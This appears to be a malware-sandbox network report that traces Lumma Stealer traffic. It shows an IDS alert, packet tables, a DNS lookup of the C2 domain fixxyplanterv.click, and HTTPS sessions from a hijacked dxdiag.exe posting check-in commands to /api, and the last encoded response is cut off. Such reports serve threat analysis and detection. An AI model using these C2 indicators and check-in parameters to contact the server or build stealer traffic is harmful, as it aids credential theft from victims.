2025-01-13T08:34:39.244158+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.4	49737	172.67.134.197	443	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 13, 2025 08:34:27.771608114 CET	49730	443	192.168.2.4	172.67.134.197
Jan 13, 2025 08:34:27.771646976 CET	443	49730	172.67.134.197	192.168.2.4
Jan 13, 2025 08:34:27.771739006 CET	49730	443	192.168.2.4	172.67.134.197
Jan 13, 2025 08:34:27.774838924 CET	49730	443	192.168.2.4	172.67.134.197
Jan 13, 2025 08:34:27.774853945 CET	443	49730	172.67.134.197	192.168.2.4
Jan 13, 2025 08:34:28.401390076 CET	443	49730	172.67.134.197	192.168.2.4
Jan 13, 2025 08:34:28.401454926 CET	49730	443	192.168.2.4	172.67.134.197
Jan 13, 2025 08:34:28.406434059 CET	49730	443	192.168.2.4	172.67.134.197
Jan 13, 2025 08:34:28.406447887 CET	443	49730	172.67.134.197	192.168.2.4
Jan 13, 2025 08:34:28.406713963 CET	443	49730	172.67.134.197	192.168.2.4
Jan 13, 2025 08:34:28.459268093 CET	49730	443	192.168.2.4	172.67.134.197
Jan 13, 2025 08:34:28.465204954 CET	49730	443	192.168.2.4	172.67.134.197
Jan 13, 2025 08:34:28.465228081 CET	49730	443	192.168.2.4	172.67.134.197
Jan 13, 2025 08:34:28.465416908 CET	443	49730	172.67.134.197	192.168.2.4
Jan 13, 2025 08:34:28.885132074 CET	443	49730	172.67.134.197	192.168.2.4
Jan 13, 2025 08:34:28.885225058 CET	443	49730	172.67.134.197	192.168.2.4
Jan 13, 2025 08:34:28.885389090 CET	49730	443	192.168.2.4	172.67.134.197
Jan 13, 2025 08:34:28.886956930 CET	49730	443	192.168.2.4	172.67.134.197
Jan 13, 2025 08:34:28.886982918 CET	443	49730	172.67.134.197	192.168.2.4
Jan 13, 2025 08:34:28.886996984 CET	49730	443	192.168.2.4	172.67.134.197
Jan 13, 2025 08:34:28.887003899 CET	443	49730	172.67.134.197	192.168.2.4
Jan 13, 2025 08:34:28.941662073 CET	49731	443	192.168.2.4	172.67.134.197
Jan 13, 2025 08:34:28.941709042 CET	443	49731	172.67.134.197	192.168.2.4
Jan 13, 2025 08:34:28.941787958 CET	49731	443	192.168.2.4	172.67.134.197
Jan 13, 2025 08:34:28.942115068 CET	49731	443	192.168.2.4	172.67.134.197
Jan 13, 2025 08:34:28.942137003 CET	443	49731	172.67.134.197	192.168.2.4
Jan 13, 2025 08:34:29.412910938 CET	443	49731	172.67.134.197	192.168.2.4
Jan 13, 2025 08:34:29.413013935 CET	49731	443	192.168.2.4	172.67.134.197
Jan 13, 2025 08:34:29.415076017 CET	49731	443	192.168.2.4	172.67.134.197
Jan 13, 2025 08:34:29.415093899 CET	443	49731	172.67.134.197	192.168.2.4
Jan 13, 2025 08:34:29.415565014 CET	443	49731	172.67.134.197	192.168.2.4
Jan 13, 2025 08:34:29.425688028 CET	49731	443	192.168.2.4	172.67.134.197
Jan 13, 2025 08:34:29.425719976 CET	49731	443	192.168.2.4	172.67.134.197
Jan 13, 2025 08:34:29.425775051 CET	443	49731	172.67.134.197	192.168.2.4
Jan 13, 2025 08:34:29.889352083 CET	443	49731	172.67.134.197	192.168.2.4
Jan 13, 2025 08:34:29.889439106 CET	443	49731	172.67.134.197	192.168.2.4
Jan 13, 2025 08:34:29.889472008 CET	443	49731	172.67.134.197	192.168.2.4
Jan 13, 2025 08:34:29.889498949 CET	443	49731	172.67.134.197	192.168.2.4
Jan 13, 2025 08:34:29.889529943 CET	443	49731	172.67.134.197	192.168.2.4
Jan 13, 2025 08:34:29.889530897 CET	49731	443	192.168.2.4	172.67.134.197
Jan 13, 2025 08:34:29.889563084 CET	443	49731	172.67.134.197	192.168.2.4
Jan 13, 2025 08:34:29.889566898 CET	49731	443	192.168.2.4	172.67.134.197
Jan 13, 2025 08:34:29.889580011 CET	443	49731	172.67.134.197	192.168.2.4
Jan 13, 2025 08:34:29.889609098 CET	49731	443	192.168.2.4	172.67.134.197
Jan 13, 2025 08:34:29.889967918 CET	443	49731	172.67.134.197	192.168.2.4
Jan 13, 2025 08:34:29.890022039 CET	49731	443	192.168.2.4	172.67.134.197
Jan 13, 2025 08:34:29.890041113 CET	443	49731	172.67.134.197	192.168.2.4
Jan 13, 2025 08:34:29.894028902 CET	443	49731	172.67.134.197	192.168.2.4
Jan 13, 2025 08:34:29.894104004 CET	49731	443	192.168.2.4	172.67.134.197
Jan 13, 2025 08:34:29.894128084 CET	443	49731	172.67.134.197	192.168.2.4
Jan 13, 2025 08:34:29.959285021 CET	49731	443	192.168.2.4	172.67.134.197
Jan 13, 2025 08:34:29.959323883 CET	443	49731	172.67.134.197	192.168.2.4
Jan 13, 2025 08:34:29.977761030 CET	443	49731	172.67.134.197	192.168.2.4
Jan 13, 2025 08:34:29.977806091 CET	443	49731	172.67.134.197	192.168.2.4
Jan 13, 2025 08:34:29.977842093 CET	49731	443	192.168.2.4	172.67.134.197
Jan 13, 2025 08:34:29.977861881 CET	443	49731	172.67.134.197	192.168.2.4
Jan 13, 2025 08:34:29.977905989 CET	443	49731	172.67.134.197	192.168.2.4
Jan 13, 2025 08:34:29.977907896 CET	49731	443	192.168.2.4	172.67.134.197
Jan 13, 2025 08:34:29.977952957 CET	49731	443	192.168.2.4	172.67.134.197
Jan 13, 2025 08:34:30.046045065 CET	49731	443	192.168.2.4	172.67.134.197
Jan 13, 2025 08:34:30.046088934 CET	443	49731	172.67.134.197	192.168.2.4
Jan 13, 2025 08:34:30.046111107 CET	49731	443	192.168.2.4	172.67.134.197
Jan 13, 2025 08:34:30.046118975 CET	443	49731	172.67.134.197	192.168.2.4
Jan 13, 2025 08:34:30.284250975 CET	49732	443	192.168.2.4	172.67.134.197
Jan 13, 2025 08:34:30.284297943 CET	443	49732	172.67.134.197	192.168.2.4
Jan 13, 2025 08:34:30.284414053 CET	49732	443	192.168.2.4	172.67.134.197
Jan 13, 2025 08:34:30.284775972 CET	49732	443	192.168.2.4	172.67.134.197
Jan 13, 2025 08:34:30.284796000 CET	443	49732	172.67.134.197	192.168.2.4
Jan 13, 2025 08:34:30.770827055 CET	443	49732	172.67.134.197	192.168.2.4
Jan 13, 2025 08:34:30.770894051 CET	49732	443	192.168.2.4	172.67.134.197
Jan 13, 2025 08:34:30.773230076 CET	49732	443	192.168.2.4	172.67.134.197
Jan 13, 2025 08:34:30.773240089 CET	443	49732	172.67.134.197	192.168.2.4
Jan 13, 2025 08:34:30.773492098 CET	443	49732	172.67.134.197	192.168.2.4
Jan 13, 2025 08:34:30.775429964 CET	49732	443	192.168.2.4	172.67.134.197
Jan 13, 2025 08:34:30.775702953 CET	49732	443	192.168.2.4	172.67.134.197
Jan 13, 2025 08:34:30.775768042 CET	443	49732	172.67.134.197	192.168.2.4
Jan 13, 2025 08:34:30.775830030 CET	49732	443	192.168.2.4	172.67.134.197
Jan 13, 2025 08:34:30.775839090 CET	443	49732	172.67.134.197	192.168.2.4
Jan 13, 2025 08:34:31.307648897 CET	443	49732	172.67.134.197	192.168.2.4
Jan 13, 2025 08:34:31.307768106 CET	443	49732	172.67.134.197	192.168.2.4
Jan 13, 2025 08:34:31.307840109 CET	49732	443	192.168.2.4	172.67.134.197
Jan 13, 2025 08:34:31.307992935 CET	49732	443	192.168.2.4	172.67.134.197
Jan 13, 2025 08:34:31.308016062 CET	443	49732	172.67.134.197	192.168.2.4
Jan 13, 2025 08:34:31.436989069 CET	49733	443	192.168.2.4	172.67.134.197
Jan 13, 2025 08:34:31.437081099 CET	443	49733	172.67.134.197	192.168.2.4
Jan 13, 2025 08:34:31.437169075 CET	49733	443	192.168.2.4	172.67.134.197
Jan 13, 2025 08:34:31.437668085 CET	49733	443	192.168.2.4	172.67.134.197
Jan 13, 2025 08:34:31.437685966 CET	443	49733	172.67.134.197	192.168.2.4
Jan 13, 2025 08:34:31.924668074 CET	443	49733	172.67.134.197	192.168.2.4
Jan 13, 2025 08:34:31.924787998 CET	49733	443	192.168.2.4	172.67.134.197
Jan 13, 2025 08:34:31.926105976 CET	49733	443	192.168.2.4	172.67.134.197
Jan 13, 2025 08:34:31.926136971 CET	443	49733	172.67.134.197	192.168.2.4
Jan 13, 2025 08:34:31.926508904 CET	443	49733	172.67.134.197	192.168.2.4
Jan 13, 2025 08:34:31.927783012 CET	49733	443	192.168.2.4	172.67.134.197
Jan 13, 2025 08:34:31.927932978 CET	49733	443	192.168.2.4	172.67.134.197
Jan 13, 2025 08:34:31.927980900 CET	443	49733	172.67.134.197	192.168.2.4
Jan 13, 2025 08:34:32.434355021 CET	443	49733	172.67.134.197	192.168.2.4
Jan 13, 2025 08:34:32.434490919 CET	443	49733	172.67.134.197	192.168.2.4
Jan 13, 2025 08:34:32.434561014 CET	49733	443	192.168.2.4	172.67.134.197
Jan 13, 2025 08:34:32.434672117 CET	49733	443	192.168.2.4	172.67.134.197
Jan 13, 2025 08:34:32.434688091 CET	443	49733	172.67.134.197	192.168.2.4
Jan 13, 2025 08:34:32.696429968 CET	49734	443	192.168.2.4	172.67.134.197
Jan 13, 2025 08:34:32.696496010 CET	443	49734	172.67.134.197	192.168.2.4
Jan 13, 2025 08:34:32.696563005 CET	49734	443	192.168.2.4	172.67.134.197
Jan 13, 2025 08:34:32.696863890 CET	49734	443	192.168.2.4	172.67.134.197
Jan 13, 2025 08:34:32.696886063 CET	443	49734	172.67.134.197	192.168.2.4
Jan 13, 2025 08:34:33.330180883 CET	443	49734	172.67.134.197	192.168.2.4
Jan 13, 2025 08:34:33.330421925 CET	49734	443	192.168.2.4	172.67.134.197
Jan 13, 2025 08:34:33.331969976 CET	49734	443	192.168.2.4	172.67.134.197
Jan 13, 2025 08:34:33.331979990 CET	443	49734	172.67.134.197	192.168.2.4
Jan 13, 2025 08:34:33.332210064 CET	443	49734	172.67.134.197	192.168.2.4
Jan 13, 2025 08:34:33.333683014 CET	49734	443	192.168.2.4	172.67.134.197
Jan 13, 2025 08:34:33.333683014 CET	49734	443	192.168.2.4	172.67.134.197
Jan 13, 2025 08:34:33.333719969 CET	443	49734	172.67.134.197	192.168.2.4
Jan 13, 2025 08:34:33.333789110 CET	49734	443	192.168.2.4	172.67.134.197
Jan 13, 2025 08:34:33.333789110 CET	49734	443	192.168.2.4	172.67.134.197
Jan 13, 2025 08:34:33.333798885 CET	443	49734	172.67.134.197	192.168.2.4
Jan 13, 2025 08:34:33.379322052 CET	443	49734	172.67.134.197	192.168.2.4
Jan 13, 2025 08:34:34.274518967 CET	443	49734	172.67.134.197	192.168.2.4
Jan 13, 2025 08:34:34.274640083 CET	443	49734	172.67.134.197	192.168.2.4
Jan 13, 2025 08:34:34.274792910 CET	49734	443	192.168.2.4	172.67.134.197
Jan 13, 2025 08:34:34.274895906 CET	49734	443	192.168.2.4	172.67.134.197
Jan 13, 2025 08:34:34.274914026 CET	443	49734	172.67.134.197	192.168.2.4
Jan 13, 2025 08:34:34.795576096 CET	49735	443	192.168.2.4	172.67.134.197
Jan 13, 2025 08:34:34.795644045 CET	443	49735	172.67.134.197	192.168.2.4
Jan 13, 2025 08:34:34.795752048 CET	49735	443	192.168.2.4	172.67.134.197
Jan 13, 2025 08:34:34.796111107 CET	49735	443	192.168.2.4	172.67.134.197
Jan 13, 2025 08:34:34.796127081 CET	443	49735	172.67.134.197	192.168.2.4
Jan 13, 2025 08:34:35.272123098 CET	443	49735	172.67.134.197	192.168.2.4
Jan 13, 2025 08:34:35.272248030 CET	49735	443	192.168.2.4	172.67.134.197
Jan 13, 2025 08:34:35.273883104 CET	49735	443	192.168.2.4	172.67.134.197
Jan 13, 2025 08:34:35.273917913 CET	443	49735	172.67.134.197	192.168.2.4
Jan 13, 2025 08:34:35.274303913 CET	443	49735	172.67.134.197	192.168.2.4
Jan 13, 2025 08:34:35.275473118 CET	49735	443	192.168.2.4	172.67.134.197
Jan 13, 2025 08:34:35.275543928 CET	49735	443	192.168.2.4	172.67.134.197
Jan 13, 2025 08:34:35.275557041 CET	443	49735	172.67.134.197	192.168.2.4
Jan 13, 2025 08:34:35.709489107 CET	443	49735	172.67.134.197	192.168.2.4
Jan 13, 2025 08:34:35.709615946 CET	443	49735	172.67.134.197	192.168.2.4
Jan 13, 2025 08:34:35.709667921 CET	49735	443	192.168.2.4	172.67.134.197
Jan 13, 2025 08:34:35.709758043 CET	49735	443	192.168.2.4	172.67.134.197
Jan 13, 2025 08:34:35.709774971 CET	443	49735	172.67.134.197	192.168.2.4
Jan 13, 2025 08:34:36.196218967 CET	49736	443	192.168.2.4	172.67.134.197
Jan 13, 2025 08:34:36.196266890 CET	443	49736	172.67.134.197	192.168.2.4
Jan 13, 2025 08:34:36.196341038 CET	49736	443	192.168.2.4	172.67.134.197
Jan 13, 2025 08:34:36.196651936 CET	49736	443	192.168.2.4	172.67.134.197
Jan 13, 2025 08:34:36.196666956 CET	443	49736	172.67.134.197	192.168.2.4
Jan 13, 2025 08:34:36.681617022 CET	443	49736	172.67.134.197	192.168.2.4
Jan 13, 2025 08:34:36.681813955 CET	49736	443	192.168.2.4	172.67.134.197
Jan 13, 2025 08:34:36.683408976 CET	49736	443	192.168.2.4	172.67.134.197
Jan 13, 2025 08:34:36.683418036 CET	443	49736	172.67.134.197	192.168.2.4
Jan 13, 2025 08:34:36.683985949 CET	443	49736	172.67.134.197	192.168.2.4
Jan 13, 2025 08:34:36.686009884 CET	49736	443	192.168.2.4	172.67.134.197
Jan 13, 2025 08:34:36.686803102 CET	49736	443	192.168.2.4	172.67.134.197
Jan 13, 2025 08:34:36.686835051 CET	443	49736	172.67.134.197	192.168.2.4
Jan 13, 2025 08:34:36.686963081 CET	49736	443	192.168.2.4	172.67.134.197
Jan 13, 2025 08:34:36.686992884 CET	443	49736	172.67.134.197	192.168.2.4
Jan 13, 2025 08:34:36.687103033 CET	49736	443	192.168.2.4	172.67.134.197
Jan 13, 2025 08:34:36.687180996 CET	443	49736	172.67.134.197	192.168.2.4
Jan 13, 2025 08:34:36.687304974 CET	49736	443	192.168.2.4	172.67.134.197
Jan 13, 2025 08:34:36.687335014 CET	443	49736	172.67.134.197	192.168.2.4
Jan 13, 2025 08:34:36.687465906 CET	49736	443	192.168.2.4	172.67.134.197
Jan 13, 2025 08:34:36.687491894 CET	443	49736	172.67.134.197	192.168.2.4
Jan 13, 2025 08:34:36.687644005 CET	49736	443	192.168.2.4	172.67.134.197
Jan 13, 2025 08:34:36.687669039 CET	443	49736	172.67.134.197	192.168.2.4
Jan 13, 2025 08:34:36.687685966 CET	49736	443	192.168.2.4	172.67.134.197
Jan 13, 2025 08:34:36.687814951 CET	49736	443	192.168.2.4	172.67.134.197
Jan 13, 2025 08:34:36.687841892 CET	49736	443	192.168.2.4	172.67.134.197
Jan 13, 2025 08:34:36.696866989 CET	443	49736	172.67.134.197	192.168.2.4
Jan 13, 2025 08:34:36.697004080 CET	49736	443	192.168.2.4	172.67.134.197
Jan 13, 2025 08:34:36.697040081 CET	443	49736	172.67.134.197	192.168.2.4
Jan 13, 2025 08:34:36.697058916 CET	49736	443	192.168.2.4	172.67.134.197
Jan 13, 2025 08:34:36.697072983 CET	49736	443	192.168.2.4	172.67.134.197
Jan 13, 2025 08:34:36.697118044 CET	443	49736	172.67.134.197	192.168.2.4
Jan 13, 2025 08:34:36.697180986 CET	49736	443	192.168.2.4	172.67.134.197
Jan 13, 2025 08:34:36.697201014 CET	443	49736	172.67.134.197	192.168.2.4
Jan 13, 2025 08:34:36.697220087 CET	49736	443	192.168.2.4	172.67.134.197
Jan 13, 2025 08:34:36.697247982 CET	49736	443	192.168.2.4	172.67.134.197
Jan 13, 2025 08:34:36.701782942 CET	443	49736	172.67.134.197	192.168.2.4
Jan 13, 2025 08:34:38.244713068 CET	443	49736	172.67.134.197	192.168.2.4
Jan 13, 2025 08:34:38.244816065 CET	443	49736	172.67.134.197	192.168.2.4
Jan 13, 2025 08:34:38.244911909 CET	49736	443	192.168.2.4	172.67.134.197
Jan 13, 2025 08:34:38.245172977 CET	49736	443	192.168.2.4	172.67.134.197
Jan 13, 2025 08:34:38.245192051 CET	443	49736	172.67.134.197	192.168.2.4
Jan 13, 2025 08:34:38.314352989 CET	49737	443	192.168.2.4	172.67.134.197
Jan 13, 2025 08:34:38.314440966 CET	443	49737	172.67.134.197	192.168.2.4
Jan 13, 2025 08:34:38.314531088 CET	49737	443	192.168.2.4	172.67.134.197
Jan 13, 2025 08:34:38.314899921 CET	49737	443	192.168.2.4	172.67.134.197
Jan 13, 2025 08:34:38.314937115 CET	443	49737	172.67.134.197	192.168.2.4
Jan 13, 2025 08:34:38.800734043 CET	443	49737	172.67.134.197	192.168.2.4
Jan 13, 2025 08:34:38.800815105 CET	49737	443	192.168.2.4	172.67.134.197
Jan 13, 2025 08:34:38.802011013 CET	49737	443	192.168.2.4	172.67.134.197
Jan 13, 2025 08:34:38.802043915 CET	443	49737	172.67.134.197	192.168.2.4
Jan 13, 2025 08:34:38.802443027 CET	443	49737	172.67.134.197	192.168.2.4
Jan 13, 2025 08:34:38.803963900 CET	49737	443	192.168.2.4	172.67.134.197
Jan 13, 2025 08:34:38.804008007 CET	49737	443	192.168.2.4	172.67.134.197
Jan 13, 2025 08:34:38.804079056 CET	443	49737	172.67.134.197	192.168.2.4
Jan 13, 2025 08:34:39.244124889 CET	443	49737	172.67.134.197	192.168.2.4
Jan 13, 2025 08:34:39.244249105 CET	443	49737	172.67.134.197	192.168.2.4
Jan 13, 2025 08:34:39.244303942 CET	49737	443	192.168.2.4	172.67.134.197
Jan 13, 2025 08:34:39.244452000 CET	49737	443	192.168.2.4	172.67.134.197
Jan 13, 2025 08:34:39.244491100 CET	443	49737	172.67.134.197	192.168.2.4
Jan 13, 2025 08:34:39.244520903 CET	49737	443	192.168.2.4	172.67.134.197
Jan 13, 2025 08:34:39.244535923 CET	443	49737	172.67.134.197	192.168.2.4

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 13, 2025 08:34:27.753268003 CET	59643	53	192.168.2.4	1.1.1.1
Jan 13, 2025 08:34:27.765988111 CET	53	59643	1.1.1.1	192.168.2.4

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Jan 13, 2025 08:34:27.753268003 CET	192.168.2.4	1.1.1.1	0x1626	Standard query (0)	fixxyplanterv.click	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Jan 13, 2025 08:34:27.765988111 CET	1.1.1.1	192.168.2.4	0x1626	No error (0)	fixxyplanterv.click		172.67.134.197	A (IP address)	IN (0x0001)	false
Jan 13, 2025 08:34:27.765988111 CET	1.1.1.1	192.168.2.4	0x1626	No error (0)	fixxyplanterv.click		104.21.6.116	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

fixxyplanterv.click

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49730	172.67.134.197	443	2596	C:\Windows\SysWOW64\dxdiag.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-13 07:34:28 UTC	266	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: fixxyplanterv.click
2025-01-13 07:34:28 UTC	8	OUT	Data Raw: 61 63 74 3d 6c 69 66 65 Data Ascii: act=life
2025-01-13 07:34:28 UTC	1123	IN	HTTP/1.1 200 OK Date: Mon, 13 Jan 2025 07:34:28 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=dn8lp1sjsqts7l9erun4tjer4q; expires=Fri, 09 May 2025 01:21:07 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=oql97DLkP7qYOW9Gik4aNiA013YhrszKNo9xECi%2Fdt33Ulm2XZl8fuc3CxSgtxkjxIJb%2FJNiH413cUAmkTLU6SqPf46CrLV3dCPIbyaYmsViwr9NK4YsUvrfQmKecgDpmGv04bwK"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 9013b43c384143cb-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1563&min_rtt=1554&rtt_var=601&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2848&recv_bytes=910&delivery_rate=1793611&cwnd=198&unsent_bytes=0&cid=e7ba924808862c0f&ts=642&x=0"
2025-01-13 07:34:28 UTC	7	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a Data Ascii: 2ok
2025-01-13 07:34:28 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.4	49731	172.67.134.197	443	2596	C:\Windows\SysWOW64\dxdiag.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-13 07:34:29 UTC	267	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 45 Host: fixxyplanterv.click
2025-01-13 07:34:29 UTC	45	OUT	Data Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 5a 71 63 68 4f 61 2d 2d 6e 65 77 26 6a 3d Data Ascii: act=recive_message&ver=4.0&lid=ZqchOa--new&j=
2025-01-13 07:34:29 UTC	1131	IN	HTTP/1.1 200 OK Date: Mon, 13 Jan 2025 07:34:29 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=tf7pghpfq05ssp6h8of4e3jumq; expires=Fri, 09 May 2025 01:21:08 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=zJoP5n08tI7n%2Bv88IU2X1%2BRM0xyafWSracehSEuSXP4VJEDsSSyTl9MnsDw1%2FwxQv%2FLXdhdoouP6gGjwdqT9Yk8ojN0P5dQzLh6%2Fjw85DWtI%2FAVIN4rPu8lRlURSGTqZqO4W4q8g"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 9013b4425aba8ce2-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1771&min_rtt=1760&rtt_var=682&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2847&recv_bytes=948&delivery_rate=1580086&cwnd=202&unsent_bytes=0&cid=c4c8a0685ba7ca7e&ts=488&x=0"
2025-01-13 07:34:29 UTC	238	IN	Data Raw: 34 36 35 0d 0a 76 57 59 4b 30 63 69 7a 50 70 63 5a 65 57 78 41 46 2f 61 50 4d 79 67 6d 57 6f 62 73 61 59 6b 32 6a 55 71 2f 42 56 6a 63 34 32 48 47 52 48 7a 7a 38 6f 63 53 74 57 6f 63 54 6e 70 6a 68 50 70 57 42 41 51 37 34 73 35 54 37 31 66 68 4f 64 6f 70 65 71 71 4f 51 34 63 41 61 37 32 37 31 68 4b 31 66 41 46 4f 65 6b 79 4e 72 56 5a 47 42 47 43 6b 69 51 50 72 56 2b 45 6f 33 6d 34 33 72 49 38 43 31 51 70 74 75 61 33 51 57 76 5a 31 46 41 6b 6c 63 70 66 6c 58 55 46 4c 4d 75 76 4f 52 61 74 54 39 32 69 46 4a 78 57 35 6c 77 44 77 42 33 6d 36 36 73 34 53 37 44 73 63 41 6d 49 74 31 4f 35 57 53 6b 6f 38 34 6f 63 42 34 56 37 70 4b 64 74 76 4b 4c 57 46 43 64 55 45 62 72 69 6e 32 55 37 37 66 78 4d 43 49 33 69 58 72 Data Ascii: 465vWYK0cizPpcZeWxAF/aPMygmWobsaYk2jUq/BVjc42HGRHzz8ocStWocTnpjhPpWBAQ74s5T71fhOdopeqqOQ4cAa7271hK1fAFOekyNrVZGBGCkiQPrV+Eo3m43rI8C1Qptua3QWvZ1FAklcpflXUFLMuvORatT92iFJxW5lwDwB3m66s4S7DscAmIt1O5WSko84ocB4V7pKdtvKLWFCdUEbrin2U77fxMCI3iXr
2025-01-13 07:34:29 UTC	894	IN	Data Raw: 52 38 4b 51 79 43 6b 31 6b 75 34 5a 75 77 35 7a 48 49 33 72 6f 64 44 77 45 70 78 38 36 33 64 48 4b 30 37 45 77 49 73 63 4a 66 69 56 6b 74 45 4b 75 75 4f 43 4f 4e 63 36 79 4c 53 61 44 57 77 69 77 54 58 44 57 2b 38 72 64 6c 61 2b 6e 68 62 51 47 4a 79 6a 4b 30 4a 43 6d 51 6f 35 34 30 66 35 6b 57 76 4e 35 4e 2b 65 72 6d 4e 51 34 64 45 62 72 32 72 33 46 7a 6e 63 78 41 46 4a 32 65 66 35 46 78 48 52 44 58 75 67 51 6a 72 55 2b 55 69 30 6d 30 2b 73 34 77 46 33 77 51 6f 2f 65 72 57 52 4c 55 6a 57 79 30 6e 5a 5a 50 68 52 77 68 2b 65 50 76 41 45 71 74 54 34 32 69 46 4a 7a 4b 37 67 67 44 55 43 32 75 37 6f 63 4e 63 35 33 30 57 43 7a 42 7a 6b 65 4e 62 53 56 59 79 36 6f 67 49 34 6c 2f 6d 4c 64 70 6a 65 76 44 42 42 4d 64 45 4d 50 4f 4c 33 46 66 35 63 51 77 4f 59 6d 72 61 Data Ascii: R8KQyCk1ku4Zuw5zHI3rodDwEpx863dHK07EwIscJfiVktEKuuOCONc6yLSaDWwiwTXDW+8rdla+nhbQGJyjK0JCmQo540f5kWvN5N+ermNQ4dEbr2r3FzncxAFJ2ef5FxHRDXugQjrU+Ui0m0+s4wF3wQo/erWRLUjWy0nZZPhRwh+ePvAEqtT42iFJzK7ggDUC2u7ocNc530WCzBzkeNbSVYy6ogI4l/mLdpjevDBBMdEMPOL3Ff5cQwOYmra
2025-01-13 07:34:29 UTC	1369	IN	Data Raw: 34 35 32 66 0d 0a 48 4b 45 32 46 4a 45 53 6a 2f 79 7a 68 53 6c 54 61 38 76 30 53 64 69 2f 6f 34 4d 30 41 78 6f 73 71 37 63 57 50 52 32 46 77 63 68 65 5a 6a 6c 58 45 5a 41 4e 2b 79 47 43 4f 4e 47 34 53 62 62 59 54 71 37 77 55 32 66 41 33 44 7a 38 70 46 34 2b 32 77 50 42 57 42 41 6c 2b 4e 66 54 56 4a 34 2b 38 41 53 71 31 50 6a 61 49 55 6e 4e 4c 4f 4b 44 39 67 4e 61 62 43 71 32 31 4c 36 63 52 4d 47 49 6e 69 56 35 6c 6c 4d 53 54 50 72 67 51 7a 6a 56 2b 4d 74 30 47 52 36 38 4d 45 45 78 30 51 77 38 34 2f 66 58 2b 52 71 57 54 73 68 65 35 72 71 52 77 70 62 64 76 33 4f 44 4f 63 55 74 32 6a 58 59 44 32 36 6a 41 6e 63 41 47 79 2b 70 64 68 56 2f 47 6b 52 41 69 78 6e 6d 65 64 55 52 45 67 39 36 34 34 4b 36 6c 72 6c 49 35 30 70 65 72 6d 5a 51 34 64 45 52 37 36 36 77 31 Data Ascii: 452fHKE2FJESj/yzhSlTa8v0Sdi/o4M0Axosq7cWPR2FwcheZjlXEZAN+yGCONG4SbbYTq7wU2fA3Dz8pF4+2wPBWBAl+NfTVJ4+8ASq1PjaIUnNLOKD9gNabCq21L6cRMGIniV5llMSTPrgQzjV+Mt0GR68MEEx0Qw84/fX+RqWTshe5rqRwpbdv3ODOcUt2jXYD26jAncAGy+pdhV/GkRAixnmedUREg9644K6lrlI50permZQ4dER766w1
2025-01-13 07:34:29 UTC	1369	IN	Data Raw: 51 47 4a 79 6a 4b 30 4a 43 6d 73 37 38 6f 52 4c 39 42 72 32 61 4e 70 72 65 75 62 42 43 64 4d 41 61 37 2b 6a 33 56 48 30 66 78 77 44 4a 6e 57 53 36 31 52 4c 54 7a 44 6f 67 51 48 6e 55 4f 4d 68 32 32 73 35 76 59 64 44 6b 55 52 76 71 2b 71 4a 48 4e 52 32 45 41 49 69 64 6f 58 71 45 51 51 45 4e 75 4b 4f 53 37 4e 43 2f 7a 2f 61 65 48 53 6e 77 51 54 54 52 44 44 7a 6f 4d 4e 5a 2b 33 38 52 43 79 5a 35 6e 75 31 55 57 45 77 2b 34 34 49 44 37 6c 76 70 4c 64 42 67 4d 62 32 54 45 64 77 41 5a 72 2f 71 6e 78 7a 79 59 31 74 57 59 6c 43 44 37 6b 46 4d 52 33 6a 37 77 42 4b 72 55 2b 4e 6f 68 53 63 36 73 49 30 49 32 41 39 6a 74 36 37 52 55 66 35 31 46 51 63 75 66 5a 6a 71 51 30 64 42 4d 4f 36 48 44 75 64 5a 37 44 72 65 5a 6e 72 77 77 51 54 48 52 44 44 7a 6a 65 4a 72 31 6a 73 